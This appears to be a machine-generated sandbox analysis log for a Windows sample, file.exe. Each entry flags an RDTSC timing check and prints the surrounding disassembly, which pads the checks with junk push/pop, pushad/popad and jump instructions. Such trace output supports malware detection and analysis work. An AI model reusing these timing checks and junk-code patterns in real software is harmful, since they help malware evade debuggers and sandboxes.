Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D6F8 second address: B2D712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D712 second address: B2D72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C6C2 second address: C1C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007FF624B4E7D6h 0x00000013 jnl 00007FF624B4E7D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AFF5 second address: C1B016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF624C75307h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B016 second address: C1B01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B01A second address: C1B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B01E second address: C1B02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B02A second address: C1B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B02E second address: C1B068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF624B4E7DEh 0x0000000e jg 00007FF624B4E7D6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FF624B4E7E7h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B068 second address: C1B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B1B7 second address: C1B1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF624B4E7DBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B1CD second address: C1B1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B59F second address: C1B5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5A5 second address: C1B5C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF624C75302h 0x0000000c jmp 00007FF624C752FAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5C1 second address: C1B5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5DD second address: C1B5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B5F9 second address: C1B61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624B4E7D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007FF624B4E813h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624B4E7DAh 0x0000001b jbe 00007FF624B4E7D6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B782 second address: C1B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1B788 second address: C1B791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C425 second address: C1C42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1C42B second address: C1C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2133C second address: C21347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21347 second address: C21394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624B4E7E9h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7DEh 0x00000012 jmp 00007FF624B4E7E7h 0x00000017 jg 00007FF624B4E7D6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21394 second address: C213A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FF624C752F6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C213A4 second address: C213A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21059 second address: C2105D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E7BC second address: C2E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E7C4 second address: C2E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C087 second address: C3C096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007FF624B4E7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F926 second address: C3F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F92A second address: C3F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F92E second address: C3F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF624C75314h 0x0000000c jmp 00007FF624C75308h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F954 second address: C3F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F958 second address: C3F95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59271 second address: C5927D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF624B4E7D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5927D second address: C59293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59293 second address: C592B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58317 second address: C58323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58323 second address: C5832E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF624B4E7D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5832E second address: C58334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58334 second address: C58338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58338 second address: C58354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75302h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58354 second address: C5835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5835E second address: C5836A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5836A second address: C58374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BC28 second address: C5BC2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BCC0 second address: C5BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BCC8 second address: C5BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BF03 second address: C5BF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D450 second address: C5D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF624C75304h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF624C75301h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D49A second address: C5D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5D49E second address: C5D4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5EC9A second address: C5ECA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800F0 second address: 4C800F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800F4 second address: 4C801A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF624B4E7E4h 0x00000010 sbb esi, 457E0F98h 0x00000016 jmp 00007FF624B4E7DBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FF624B4E7E8h 0x00000022 or al, FFFFFFF8h 0x00000025 jmp 00007FF624B4E7DBh 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007FF624B4E7E8h 0x00000031 movzx eax, dx 0x00000034 pop edi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov di, AA6Eh 0x0000003c mov esi, ebx 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FF624B4E7E1h 0x00000045 mov ebp, esp 0x00000047 jmp 00007FF624B4E7DEh 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FF624B4E7DDh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801A9 second address: 4C801AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801AE second address: 4C801BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EE7 second address: 4C60EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EF9 second address: 4C60EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EFD second address: 4C60F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d jmp 00007FF624C752FFh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF624C752FBh 0x0000001f xor cl, FFFFFFDEh 0x00000022 jmp 00007FF624C75309h 0x00000027 popfd 0x00000028 mov dx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40100 second address: 4C40105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40105 second address: 4C40139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF624C752FDh 0x0000000a adc cl, FFFFFFD6h 0x0000000d jmp 00007FF624C75301h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dh, D5h 0x0000001c mov bx, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40139 second address: 4C401A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1CA73BC2h 0x00000008 mov ebx, 76B1520Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 movzx esi, di 0x00000015 jmp 00007FF624B4E7E7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FF624B4E7E6h 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF624B4E7E0h 0x00000028 push dword ptr [ebp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF624B4E7DAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401A0 second address: 4C401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401A4 second address: 4C401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401AA second address: 4C401E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FCh 0x00000009 and eax, 249DD548h 0x0000000f jmp 00007FF624C752FBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624C752FBh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401E1 second address: 4C401E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401E7 second address: 4C401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401EB second address: 4C401EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4022E second address: 4C4023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4023E second address: 4C40242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40242 second address: 4C40257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C752FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40257 second address: 4C4025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB0 second address: 4C60CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB4 second address: 4C60CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB8 second address: 4C60CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CBE second address: 4C60CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1D6ACFE1h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60822 second address: 4C6085C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624C75302h 0x00000013 add si, 9398h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606EC second address: 4C606F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606F0 second address: 4C60703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60703 second address: 4C60749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 920Ah 0x00000007 pushfd 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d adc eax, 565C98AEh 0x00000013 jmp 00007FF624B4E7E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624B4E7DDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60749 second address: 4C60776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C75303h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60776 second address: 4C60793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60793 second address: 4C607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C607A3 second address: 4C607A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C604A5 second address: 4C604B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7039E second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80488 second address: 4C804A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804A3 second address: 4C804CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF624B4E7DDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804CC second address: 4C804D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2612h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804D5 second address: 4C804F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804F4 second address: 4C804FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804FA second address: 4C80549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FF624B4E7DBh 0x0000000f xor si, AB6Eh 0x00000014 jmp 00007FF624B4E7E9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF624B4E7DDh 0x00000028 rdtsc
